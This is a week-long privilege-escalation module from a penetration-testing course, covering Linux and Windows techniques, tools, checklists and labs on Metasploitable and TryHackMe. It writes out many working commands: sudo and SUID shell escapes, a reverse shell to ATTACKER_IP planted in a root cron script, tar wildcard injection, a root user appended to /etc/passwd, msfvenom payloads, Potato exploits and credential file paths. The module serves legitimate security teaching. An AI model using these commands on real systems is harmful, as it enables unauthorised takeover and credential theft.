CSY202 Week 09 Intermediate

Practice privilege escalation before moving to reading resources.

Applied Cryptography

Track your progress through this week's content

Opening Framing: Why Privilege Escalation Matters

You've gained access to a system, but you're a low-privilege user. You can read some files, run some commands, but the real prizes—credentials, sensitive data, system configuration— require higher privileges.

Privilege escalation is the process of exploiting misconfigurations, vulnerabilities, or design flaws to gain higher access levels. From regular user to root. From user to SYSTEM. From local admin to domain admin.

This week covers both Linux and Windows privilege escalation techniques—the enumeration, the common vulnerabilities, and the tools that help automate discovery.

Key insight: Most initial access is low-privilege. Knowing how to escalate is what makes that access meaningful.

1) Privilege Escalation Concepts

Understanding the fundamentals: 

Types of Privilege Escalation:

Vertical (most common):
- Low privilege → High privilege
- User → Root/Administrator
- What we usually mean by "privesc"

Horizontal:
- Same privilege level, different user
- User A → User B
- Access different data/resources

Privilege levels:

Linux:
- Regular user (uid >= 1000)
- System users (uid < 1000)
- Root (uid 0) - full control

Windows:
- Standard user
- Local administrator
- SYSTEM (highest local)
- Domain admin (highest in domain)

Common Privesc Categories: 

Misconfigurations:
- Weak file permissions
- Misconfigured services
- Writable scripts/binaries
- Sudo misconfigurations

Credential Exposure:
- Passwords in files
- Credential reuse
- Weak passwords

Kernel/OS Exploits:
- Unpatched vulnerabilities
- CVE exploits
- Local privilege escalation bugs

Service Exploits:
- Vulnerable installed software
- Unquoted service paths
- DLL hijacking

Design Flaws:
- SUID binaries
- Scheduled tasks with weak permissions
- PATH hijacking

Privesc Methodology: 

1. Enumerate thoroughly
   - System information
   - User context
   - Running processes
   - Installed software
   - Network connections
   - File permissions

2. Identify potential vectors
   - What looks exploitable?
   - What misconfigurations exist?
   - What vulnerabilities apply?

3. Prioritize by reliability
   - Misconfigurations (reliable)
   - Credential exposure (reliable)
   - Kernel exploits (risky, may crash)

4. Exploit and verify
   - Attempt escalation
   - Confirm new privileges
   - Document method

Key insight: Thorough enumeration finds the path. Most systems have multiple privesc vectors—you just need to find one.

2) Linux Privilege Escalation

Common vectors on Linux systems:

Sudo Misconfigurations: 

# Check sudo permissions
sudo -l

# Output example:
User www-data may run the following commands:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/find

# GTFOBins shows how to exploit:
# https://gtfobins.github.io/

# Vim to root shell:
sudo vim -c ':!/bin/bash'

# Find to root shell:
sudo find . -exec /bin/bash \; -quit

# Less to root shell:
sudo less /etc/passwd
!/bin/bash

# Nano to shell:
sudo nano
^R^X
reset; bash 1>&0 2>&0

# Python:
sudo python -c 'import os; os.system("/bin/bash")'

# Perl:
sudo perl -e 'exec "/bin/bash";'

SUID/SGID Binaries: 

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Common exploitable SUID binaries:
/usr/bin/find
/usr/bin/vim
/usr/bin/python
/usr/bin/perl
/usr/bin/nmap (older versions)
/usr/bin/env

# Custom/unusual SUID binaries are prime targets

# Example: SUID find
find . -exec /bin/bash -p \; -quit

# Example: SUID python
python -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Example: SUID nmap (interactive mode)
nmap --interactive
!sh

Cron Jobs: 

# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
cat /var/spool/cron/crontabs/*

# Look for:
# 1. Scripts run as root that you can write to
# 2. Wildcards in commands
# 3. Missing absolute paths

# Example: Writable script
# If /opt/backup.sh runs as root and you can write to it:
echo '/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

# Example: Wildcard exploitation
# Cron: cd /tmp; tar czf /backup/files.tar.gz *
echo "" > "/tmp/--checkpoint=1"
echo "" > "/tmp/--checkpoint-action=exec=sh shell.sh"
echo '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /tmp/shell.sh

Writable /etc/passwd: 

# Check if writable
ls -la /etc/passwd

# If writable, add root user:
# Generate password hash:
openssl passwd -1 -salt xyz password123
# Output: $1$xyz$H2Vh.example.hash

# Add to /etc/passwd:
echo 'newroot:$1$xyz$H2Vh.example.hash:0:0:root:/root:/bin/bash' >> /etc/passwd

# Switch to new root user:
su newroot
# Password: password123

Kernel Exploits: 

# Check kernel version
uname -a
cat /proc/version

# Search for exploits
searchsploit linux kernel [version] privilege escalation

# Famous examples:
# Dirty COW (CVE-2016-5195) - Linux < 4.8.3
# PwnKit (CVE-2021-4034) - Polkit
# Dirty Pipe (CVE-2022-0847) - Linux 5.8+

# Use with caution - may crash system!

# Example: Check for PwnKit vulnerability
ls -la /usr/bin/pkexec
# If SUID and vulnerable version, exploit exists

Key insight: Misconfigurations (sudo, SUID, cron) are more reliable than kernel exploits. Check GTFOBins for every binary.

3) Windows Privilege Escalation

Common vectors on Windows systems:

Service Misconfigurations: 

# Unquoted Service Paths
# If service path is: C:\Program Files\My App\service.exe
# Windows tries: C:\Program.exe, C:\Program Files\My.exe, etc.

# Find unquoted paths:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Exploit:
# Place malicious exe at C:\Program.exe or C:\Program Files\My.exe
# Restart service

# Service Binary Permissions
# Check if you can write to service binary:
icacls "C:\path\to\service.exe"

# If writable, replace with malicious exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > service.exe
# Replace and restart service

# Service Configuration Permissions
# Check with accesschk (Sysinternals)
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

# If SERVICE_CHANGE_CONFIG, modify service:
sc config [service] binpath= "C:\path\to\malicious.exe"
sc stop [service]
sc start [service]

Always Install Elevated: 

# Check registry keys
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both are 1, can install MSI as SYSTEM

# Create malicious MSI:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f msi > shell.msi

# Install:
msiexec /quiet /qn /i shell.msi

Token Impersonation: 

# Check current privileges
whoami /priv

# Key privileges for impersonation:
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege

# If service account has these (IIS, SQL Server often do):
# Use Potato exploits

# PrintSpoofer (Windows 10, Server 2016/2019)
PrintSpoofer.exe -i -c "cmd"

# JuicyPotato (older Windows)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *

# GodPotato (newer)
GodPotato.exe -cmd "cmd /c whoami"

# RoguePotato
RoguePotato.exe -r ATTACKER_IP -e "cmd.exe" -l 9999

Credential Locations: 

# Saved credentials
cmdkey /list

# If credentials saved:
runas /savecred /user:DOMAIN\admin cmd.exe

# Unattend files (from installations)
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\Unattend.xml

# GPP (Group Policy Preferences) - older domains
# MS14-025 - passwords in SYSVOL
findstr /S /I cpassword \\domain\sysvol\*.xml

# SAM/SYSTEM backup
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM

DLL Hijacking: 

# Applications search for DLLs in specific order:
# 1. Application directory
# 2. System directories
# 3. PATH directories

# If app loads DLL from writable location:
# Create malicious DLL with same name

# Find missing DLLs:
# Use Process Monitor (Sysinternals)
# Filter: Result = NAME NOT FOUND, Path ends with .dll

# Create payload DLL:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f dll > hijacked.dll

# Place in writable location app searches

Key insight: Service misconfigurations and token impersonation are the most common Windows privesc vectors.

4) Automated Enumeration Tools

Tools accelerate privilege escalation enumeration:

Linux Tools: 

# LinPEAS - comprehensive enumeration
# Download and run:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or transfer and run:
./linpeas.sh | tee linpeas_output.txt

# Color coding:
# RED/YELLOW - 95% privesc vector
# RED - Should check manually
# LIGHT CYAN - Users with console
# BLUE - Non-privileged users
# GREEN - Common things

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration (lse)
./lse.sh -l 1  # Level 1 = more info

# Unix Privesc Check
./unix-privesc-check standard

Windows Tools: 

# WinPEAS - comprehensive enumeration
.\winPEASany.exe
.\winPEASx64.exe

# PowerUp - PowerShell privesc
. .\PowerUp.ps1
Invoke-AllChecks

# Find specific issues:
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService
Find-PathDLLHijack
Get-RegistryAlwaysInstallElevated

# Seatbelt - safety checks
.\Seatbelt.exe -group=all

# JAWS - Just Another Windows Script
.\jaws-enum.ps1

# Windows Exploit Suggester
# Run on attacker machine with systeminfo output
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo systeminfo.txt

Using Enumeration Output: 

Interpretation process:

1. Run enumeration tool
2. Review highlighted findings
3. For each finding:
   - Is it exploitable?
   - What's the risk of exploitation?
   - What access does it give?

4. Prioritize:
   - High: Clear path to root/SYSTEM
   - Medium: Requires additional steps
   - Low: Complex or unreliable

5. Attempt exploitation
   - Start with most reliable
   - Document attempts
   - Move to next if fails

Common false positives:
- Kernel exploits that don't apply
- Services you can't restart
- Files you can't actually write

Key insight: Tools enumerate; humans analyze. Don't blindly trust tool output—verify findings manually.

5) Privilege Escalation Methodology

A systematic approach to privesc: 

Linux Checklist:

□ Basic Enumeration
  □ whoami, id, groups
  □ uname -a (kernel version)
  □ cat /etc/os-release

□ Sudo
  □ sudo -l
  □ Check each allowed command on GTFOBins

□ SUID/SGID
  □ find / -perm -4000 2>/dev/null
  □ Check unusual binaries on GTFOBins

□ Cron Jobs
  □ /etc/crontab, /etc/cron.*
  □ Look for writable scripts
  □ Look for wildcards

□ File Permissions
  □ Writable /etc/passwd?
  □ Writable scripts run by root?
  □ Writable service configs?

□ Credentials
  □ History files
  □ Config files
  □ SSH keys

□ Kernel Exploits
  □ Check version against known CVEs
  □ Use as last resort

Windows Checklist: 

Windows Checklist:

□ Basic Enumeration
  □ whoami /all
  □ systeminfo
  □ net user, net localgroup

□ Service Misconfigurations
  □ Unquoted service paths
  □ Writable service binaries
  □ Modifiable service configs

□ Registry
  □ AlwaysInstallElevated
  □ AutoLogon credentials
  □ Weak permissions

□ Token Privileges
  □ whoami /priv
  □ SeImpersonatePrivilege → Potato exploits

□ Credentials
  □ cmdkey /list
  □ Unattend.xml files
  □ GPP passwords

□ Scheduled Tasks
  □ Writable task binaries
  □ Task misconfigurations

□ DLL Hijacking
  □ Missing DLLs
  □ Writable DLL paths

□ Kernel Exploits
  □ Windows Exploit Suggester
  □ Use as last resort

Documentation: 

Document each escalation:

PRIVILEGE ESCALATION
====================
Target: [hostname]
Initial Access: [user]
Final Access: root/SYSTEM

Method: [technique used]

Steps:
1. [enumeration that found it]
2. [exploitation command]
3. [verification of new privileges]

Evidence:
[screenshot or command output]

Impact:
- Full system control
- Access to all files
- Ability to pivot further

Key insight: Follow the checklist. It's easy to miss things when you're excited about initial access.

Real-World Context: Privesc in Engagements

Professional considerations for privilege escalation:

Kernel Exploit Risks: Kernel exploits can crash systems. On production servers, this is unacceptable. Always prefer misconfigurations over kernel exploits when possible, and confirm with the client before attempting risky exploits.

Time Boxing: In real engagements, you might spend hours on privesc. Know when to move on—document the low-privilege access and try other systems.

Defense Evasion: In red team engagements, some privesc techniques are noisy. Creating new users or modifying services may trigger alerts.

MITRE ATT&CK Mapping:

  • T1548 - Abuse Elevation Control Mechanism: Sudo, UAC bypass
  • T1068 - Exploitation for Privilege Escalation: Kernel exploits
  • T1574 - Hijack Execution Flow: DLL hijacking, PATH manipulation
  • T1053 - Scheduled Task/Job: Cron/task exploitation

Key insight: Document everything. Even if you don't achieve root/SYSTEM, showing the path demonstrates the vulnerability.

Guided Lab: Linux Privilege Escalation

Practice privesc on Metasploitable.

Step 1: Get Low-Privilege Shell

# Use any method, but start as non-root user
# Example: SSH as msfadmin
ssh msfadmin@[metasploitable-ip]
# Password: msfadmin

# Verify you're not root
whoami
id

Step 2: Basic Enumeration

# System info
uname -a
cat /etc/os-release

# Current user
id
groups

# Other users
cat /etc/passwd | grep -v nologin
cat /etc/shadow 2>/dev/null

Step 3: Check Sudo

# What can we run as sudo?
sudo -l

# Check GTFOBins for any allowed commands
# https://gtfobins.github.io/

Step 4: Check SUID Binaries

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Research unusual ones on GTFOBins
# Try exploitation

Step 5: Check for Other Vectors

# Writable files
find / -writable -type f 2>/dev/null | grep -v proc

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# Kernel version for exploits
uname -a
searchsploit linux kernel [version]

Step 6: Escalate

# Use discovered vector to get root
# Document the method used

# Verify escalation
whoami
id

Reflection (mandatory)

  1. What vectors did you find on this system?
  2. Which was easiest to exploit?
  3. How would you prevent this escalation?
  4. What would be different on a hardened system?

Week 9 Outcome Check

By the end of this week, you should be able to:

Next week: Active Directory Attacks—the crown jewels of enterprise networks.

🎯 Hands-On Labs (Free & Essential)

Practice privilege escalation before moving to reading resources.

🎮 TryHackMe: Linux PrivEsc

What you'll do: Enumerate Linux systems and exploit common privesc paths.
Why it matters: Linux privilege escalation is a core pentest skill.
Time estimate: 2-3 hours

Start TryHackMe Linux PrivEsc →

🎮 TryHackMe: Windows PrivEsc

What you'll do: Enumerate Windows hosts and escalate to SYSTEM.
Why it matters: Windows privesc is essential for enterprise pentests.
Time estimate: 2-3 hours

Start TryHackMe Windows PrivEsc →

📝 Lab Exercise: Privesc Checklist + Notes

Task: Build a one-page checklist for Linux + Windows privesc.
Deliverable: Checklist with commands + evidence screenshots or notes.
Why it matters: A repeatable checklist prevents missed paths.
Time estimate: 60-90 minutes

🛡️ TryHackMe: Crypto 101

What you'll do: Practice common cryptography concepts in a guided room.
Why it matters: Privilege escalation often involves credential storage and crypto.
Time estimate: 1-2 hours

Start TryHackMe Crypto 101 →

💡 Lab Tip: Start with quick wins (sudo, SUID, services) before deeper kernel research.

🛡️ Crypto Clues in Privilege Escalation

Privilege escalation often exposes secrets: cached credentials, DPAPI blobs, and encrypted config files. 

Where to look:
- Password managers and browser stores
- DPAPI-protected secrets on Windows
- Encrypted config files with weak keys
- Key material in environment variables

📚 Building on CSY101 Week-13: Model key exposure paths during escalation.

Resources

Complete the required resources to build your foundation.

Lab: Multi-Vector Privilege Escalation

Goal: Achieve root/SYSTEM through multiple different privilege escalation techniques.

Part 1: Linux Privilege Escalation

  1. Access Metasploitable as low-privilege user
  2. Run LinPEAS or manual enumeration
  3. Identify at least 3 potential privesc vectors
  4. Successfully escalate to root using 2 different methods
  5. Document both methods with evidence

Part 2: Windows Practice (if available)

  1. If you have a Windows VM in your lab:
    • Run WinPEAS
    • Check for service misconfigurations
    • Check token privileges
  2. Otherwise, analyze WinPEAS sample output

Part 3: Methodology Application

  1. Create your own privesc checklist
  2. Compare to the ones in the lesson
  3. Note what you would add from experience

Part 4: Report

  1. Document each successful escalation:
    • Initial access level
    • Enumeration that found the vector
    • Exploitation steps
    • Final access level
    • Remediation recommendation

Deliverable (submit):

Checkpoint Questions

  1. What is the difference between vertical and horizontal privilege escalation?
  2. How do you check what commands you can run with sudo?
  3. What is a SUID binary and why is it a privesc vector?
  4. What Windows privilege enables token impersonation attacks?
  5. What is an unquoted service path vulnerability?
  6. Why are kernel exploits considered risky in real engagements?

Week 09 Quiz

Test your understanding of Linux and Windows privilege escalation paths.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Weekly Reflection

Reflection Prompt (200-300 words):

This week you learned privilege escalation—transforming limited access into full system control. You enumerated systems, identified misconfigurations, and exploited them.

Reflect on these questions:

A strong reflection will connect technical findings to broader security principles and defensive recommendations.

Verified Resources & Videos

Privilege escalation is where persistence meets creativity. The enumeration techniques and exploitation methods you've learned apply to almost every penetration test. Keep practicing— every system is different. Next week: Active Directory, where enterprise networks are won or lost.

← Previous: Week 08 Next: Week 10 →